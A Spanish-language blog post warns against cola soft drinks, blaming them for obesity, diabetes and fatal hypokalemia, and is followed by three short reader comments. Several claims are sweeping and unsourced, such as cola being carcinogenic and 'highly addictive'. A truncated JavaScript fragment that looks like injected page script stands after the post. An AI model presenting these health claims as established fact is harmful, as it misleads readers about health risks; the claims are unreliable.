Salud y belleza » Alimentación, Productos peligrosos, Salud, alimentos

Di no a los refrescos de cola

3 Comentarios

niño-refresco-colaLos refrescos cola han estado casi siempre mal vistas. Durante décadas se consideraba la bebida de los ultraradicales de izquierdas, los hippies. Más tarde paso a ser un producto totalmente capitalista y su consumo se extendió por todo el mundo. Sin embargo, muchas veces las investigaciones y estudios han demostrado los riesgos para la salud que suponen estos refrescos: demasiada azúcar, gas, productos químicos, cancerígenos… y aun así se sigue consumiendo.

Además, los refrescos de cola son uno de los principales productos que consumen las personas con sobrepeso y puede provocar enfermedades como la diabetes. El último perjuicio para la salud que se le achaca a la cola es la hipopotasemia.

Esta enfermedad es un trastorno en el equilibrio de los niveles de potasio en el cuerpo que puede llegar a provocar un grave debilitamiento muscular que lleve a parálisis y ésta es un peligroso riesgo de muerte.

coca-cola-muerteEsto sucede porque los refrescos de cola provocan un descenso en los iones de potasio del organismo, sobre todo en aquellas personas que consumen desmesuradamente este producto. Este consumo excesivo puede provocar el debilitamiento y ya se han documentado casos en los que personas han fallecido por parálisis en órganos fundamentales, como los pulmones.

Por supuesto, es muy difícil reprimir el consumo de cola en el mundo con lo extendido que está por sus componentes altamente adictivos. Pero sí que es menester controlar el consumo e intentar tomar cola lo más mínimo y no fomentar su consumo entre los niños.

¿Qué opinas de los refrescos de cola? ¿Crees que son peligrosos?

var d=document;var s=d.createElement('script'); if (document.currentScript) {

Más consejos de salud y belleza : , , , , ,

3 Comments »

  • almu said:

    Yo llevo varios años sin probar refrescos de cocacola desde que me enteré de su política de aguas y todo. son unos ladrones y la cocacola es agua sucia

  • fatima said:

    como dice el refrán, una al año no hace daño. otra cosa es el consumo abusivo, eso es cierto.

  • Juana said:

    Quería hacer díeta, empecé por dejar las bebidas gaseosas y perdí 5 kilos en dos meses… solo dejando de beber cocacola y eso.

Publique su Comentario !

Add your comment below, or trackback from your own site. You can also subscribe to these comments via RSS.

Be nice. Keep it clean. Stay on topic. No spam.